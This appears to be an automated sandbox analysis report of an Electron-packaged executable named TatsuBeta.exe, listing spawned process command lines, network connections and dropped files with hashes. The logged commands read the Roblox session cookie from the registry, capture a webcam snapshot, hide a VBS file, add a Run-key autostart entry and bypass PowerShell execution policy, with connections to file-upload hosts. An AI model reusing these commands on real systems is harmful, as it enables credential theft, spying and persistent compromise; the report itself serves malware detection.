C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\StJVqx1Lg29AqxRkcq7z\System\cam.1764_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_mz5vxz /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs\""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_mz5vxz /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs /f

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutZaMVP.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutZaMVP.ps1" -RunAsAdministrator

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1500 --field-trial-handle=1688,5657953363304061064,15558905826196672242,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 136.175.8.205:443 store6.gofile.io tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.3:443 github.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\d3dcompiler_47.dll

MD5 37b994f2927cd47ddff8de8675f05131
SHA1 acc69b3f3d3e0f4ecee45b427cbe8b89ba5a2a8a
SHA256 1beec60b4c2a717e09fa91733ea98f682e2ee4e939f601b92850c6efb7e6bc30
SHA512 88a31b2b32004324aefc648f07bcd4ce0b8c7c263e49dd1bdd900117f22d888e268d457cdc5e748faf6e70cf1b354ea4d7936d8240f3bb1439474459a4aff8c8

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\ffmpeg.dll

MD5 11143af05bc68e256e30f95a5f9d0394
SHA1 5877f421b9e46fd1019d77ecde1bad65739a202f
SHA256 1b7804397d17a4ff2d252cb8914b1b6f5cf1d5a269b8eba1e9e2402dea05e154
SHA512 2df7b4d22f4156a8a4509ea61db0a65c26b64fd367392e6c9374cc87b0b934c529040a73e1162d37430f56cac225a5f7ec57a33b3b7fa258121ee678face03d0

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\icudtl.dat

MD5 00453a679faa6a1f15b207dfd9c3d958
SHA1 08498d4a43fd056086862cd86e52d542853fa008
SHA256 a8cae6e875ba59fd002fcffb59b97c22cea6c945d20124f57f8860d6720d57ed
SHA512 eda97ba43469e274e37af24b87952ebf496313165de9ac47f081385b244cadaccf967ae5ecd569be249b0a2c38b70d2b2685b8e4d88731a471157f318e18ea9f

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\libEGL.dll

MD5 9e9ef904ecfa72ca89918dba71b33a4e
SHA1 879bdfc9baf91e660ad9cf7143a7b78580007e3c
SHA256 0e0a4955530ad1fdcd7770631806dde88b882aaa438be12bb8b8a9270b5ee599
SHA512 de6d4eed58314d7d09bdbdf44c352f8434841f17cfe01bfb4de3a8b97919c2a196a8f1c41868998ec99bde19ac489ff1dcba4cef76e5e89441a395e2255b55f7

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\snapshot_blob.bin

MD5 46497f2a4114acb1413b49e83cb84f4b
SHA1 fcc2322e3c6bfc0a7093b66b9f0973e4208b8a10
SHA256 74741e8759995ca0729b81004c27966610ac372bd5ee5e70600019dcc0f5630f
SHA512 1591cea6d5443a5c4328f01d3bd7688fdfa81ac7bb1c5a19d0d1db425258422ebec0c1ba2efe46f7e45495aea99469f22ac95343aca74c327bf3b6e81d2c9370

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources.pak

MD5 c65aa0e1d96f36e5b9082174f7a37877
SHA1 7837fd545f8c6c1f12e443f6464e12dcd95b34f0
SHA256 b828b2867f1e3be2c0784ddaaef663768c9b9da844e58fa53c96e2e974d01648
SHA512 f12177375d56c4dc1531e604bc9fba2409eb0b97f9ec4c7bfa7bf1dd95c21fe678ee9dde0d48fc14b4a2fb330e9eb38bcdaba2160cbaf9e11eb1fefdcc390bff

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\LICENSES.chromium.html

MD5 5b30456c2d5f3ca4115c003f7b46b0ed
SHA1 98f34b6dc3da8fb2c8901090a11903d27ee5e07d
SHA256 57567f637d77945bf300bc89748da8da9478536f0761746ed72d76286e7adf16
SHA512 d24ae6b6333709299c3779d5e230c169e35ff2ef50200f6618e2777586db610243b5b7535b860fe0fb6705dc0aa23753ddab13a0edfe6f8857e7b659f194acaa

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\libGLESv2.dll

MD5 ab07ff77265bc18df892fe911f318c02
SHA1 0c635e2e45a8af1945380aa30d9362ad7036def7
SHA256 40b911c7c36d7ce1e3a3a1fc679f569a737647fb3da1c403270e1a13ba82b606
SHA512 ae616db66119f3809545226b8feea813de6f260395514cdd54d907594f6544b803273844bf3b82aee678ea43b4b80aac82acfe0c7603bedefa15de985c9fea61

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\TatsuBeta.exe

MD5 2d61476ad8a3a785e19e791b649b5be3
SHA1 543b686122083f326152c70db1ad80cd75f3bcd8
SHA256 87bcfa784d620cfe82ced82df4ca7010546d8f832d9750b881ed37d2c7969647
SHA512 553ede5650198b8261479df3f824609da19790edcf658068ee3320009ce7dcd62c229c14dbfb07fe8446e107d31fc0db05cb198a7bbea3e4bd75c62fd53b2ba3

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\vulkan-1.dll

MD5 5651043fe251259389000fb0ac57735d
SHA1 5246e8babab6ed6a6f7f7bdb1690470e870ab207
SHA256 56a859c63a6d3cf976c8def2daca2f278ff80f0a8d66edd7a71f870fc35f3256
SHA512 3af05cf0eb8a501088feef8c0035a7661731744b2189a199cc7df82a77697e0a89dae688f71890f687786c25af38c62a107c006f88ef182992752cd16f1736c7

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\vk_swiftshader.dll

MD5 13496495dc533cebd91b4bc1e9709458
SHA1 0de69637260a9214fefbf5bce4f429f0d53223c8
SHA256 bf4bce4aa660f61634948953e2c6a03878cf7141707cdbdfaada4656f0a522a7
SHA512 26f775ab7cf447921541a8ee5fba2210b53e26245df5c9e8f0bac07c27ce91c29512e58f45f7981d5648d053f80aaed18abf511ef429bbd07229fdf5ce66468a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\v8_context_snapshot.bin

MD5 a77e7a029ebd840cdcc54734843c897e
SHA1 9be00e24c67f0705c7fad834e0606a348dff7848
SHA256 961a58ba04368dcbd3ab8c33736db3d04125aa04b48684fd7ddbe35bf96aae7b
SHA512 7cd5880d6e9ceb1e58fbf443cdec0253b02a3fe6d17279fe9483df066a42267d9ffd1c1ecaa9c5987487073b134eec4e1f11f6e0760009d1a7747fde4870e3b9

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\el.pak

MD5 989af49462751494f03b9771d74e937d
SHA1 f752425a08e5959984ce6cef05fd03a786dd6a51
SHA256 f520299ee761ff7a398a019e237f0ca22ea67485e9020ff5201cfe5b152b74b0
SHA512 0e7331f7752d6c2aa7aa23e8c5a1a80ddc60b4c298ee42c8233d043a58814adc387c6dbae86cfafad6013865b09672984bc06e1a0b998eaff0c44751e7741471

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\mr.pak

MD5 3c0e3bdf64eb568883331c3681d1eaad
SHA1 29a33c55a3c69150d9705db48d7a9aba1ece9a69
SHA256 0cb820faebab13e0800ec945c8ca8e614f1aa5a73d0bd19257db58a97fa9fccd
SHA512 02cbe78549d1294b4b30ababd9015ccedf71c8d1a7493f8df80d9e64827b635278c3d59f32673d016b7797865615b651e97d2c83092dc0dd6baeceeab451fc1c

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ml.pak

MD5 2914bce933d202ac3e5dc7404dbdd194
SHA1 1cc24f332ff9774fad559122c3abe3b8fae18582
SHA256 1176c4663b713db35f4ab6fbed3b487c7b9d4b76b394cff1cb00b608b2438df6
SHA512 af6e25eb8fe2d7b30b5552c7818a8ca30ee94c9db58590b6396278f5dc02a5679465663e7af2b8071028565a2a5e78997e5098b02f6bdb3330708aadcb282a67

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ko.pak

MD5 fdcc3f906a721785d7111fc1a43f1ff2
SHA1 4da36ea590bf9a98f768c75b6d60c9a03c8170dd
SHA256 80ca32d7c7701af265d31a6a03a5483e18ed2332616e5bdff5512f4da61f7226
SHA512 3ad251e1338720b4a2ead46acb8ef2a8cc13601feb87b77371da1aa3d702c7df9fa46f4a80087d4f64d1f11aa331b81da15d4ab522bc38bcfb8520d647f415dd

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\kn.pak

MD5 e844e1aebba009f059bc441d4ee0280d
SHA1 8febce063818d6f5dad4559f05b4dff6108fe87e
SHA256 0a6b11bc75e415f95f6aef1a083c7eb9783f9f1d032ef3e165597f53d1241352
SHA512 523547b4b0c5a99076ecefefe49761de78b29cec1f0dbe67600189f41bf3b75f948607816cd3fefdc2f2d5c4cf36b39d846519716db05101c44a415c5def2e84

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\hi.pak

MD5 962e8a42592f80fa647e18de75659326
SHA1 ee470cea16510ecdd4e4565dd50fcb8320ce4036
SHA256 4899307203dbdc8ad47e02f1c3c32d80528d32364427c3b665c0f1142607a6c4
SHA512 bda6fee9366b8e907efeba33928422f9c2e74a70ad9a906478e05377564d8a95707324bba49433e4269d5a18ede5c22c8d264fd5bc95e514326bf23aa1d8d75a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\gu.pak

MD5 0b2a64f55226b259bb90af52837cff83
SHA1 426558ba6bc737574ac21bf70791aa687c32eb86
SHA256 475cb758da46e0df64d90e9ce4f65afcc547e45763d81d51e453fccb2cc37d3e
SHA512 97c727826c5e0b1679696a97a67993aa5c7e7a2aabe60df0bd90b14ba8d56a057c394d6ed6063b3e603f385f11c84afe17f04c2b4e559e4ae776c10921e25a56

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

